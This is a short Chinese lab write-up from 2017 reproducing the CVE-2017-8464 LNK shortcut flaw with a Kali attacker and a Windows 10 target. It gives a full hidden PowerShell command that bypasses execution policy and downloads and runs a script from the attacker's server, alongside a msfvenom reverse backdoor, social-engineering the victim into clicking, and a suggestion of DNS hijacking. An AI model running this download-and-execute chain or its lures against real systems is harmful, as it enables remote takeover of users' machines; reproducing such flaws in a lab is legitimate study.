CVE-2017-8464 LNK文件(快捷方式)远程代码执行漏洞复现

北京时间2017年6月13日凌晨,微软官方发布6月安全补丁程序,“震网三代” LNK文件远程代码执行漏洞(CVE-2017-8464)和Windows搜索远程命令执行漏洞(CVE-2017-8543).

CVE-2017-8543,当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。

CVE-2017-8464,当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。

 

攻击机 Kali

IP: 192.168.1.113

 

靶机:win10

IP: 192.168.1.3

 

1.使用msfvenom生成一个msf反弹后门

 

2.将/opt 下的search.psl 复制到 /var/www/html 下

 

3.启动apache服务service apache2 start

4.在靶机上创建一个powershell远程快捷:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.113/search.ps1');test.ps1"

5.在kali下监听

6.利用社会工程学误导靶机点击powershell快捷方式,kali就可以监听到了

成功

 

 

思考:当Apache启动之后,靶机可以通过访问192.168.1.113来触发spl,那么可以利用DNS劫持使靶机,引导靶机访问。 

 

posted @ 2017-07-25 19:01  HsinTsao  阅读(1023)  评论(0编辑  收藏  举报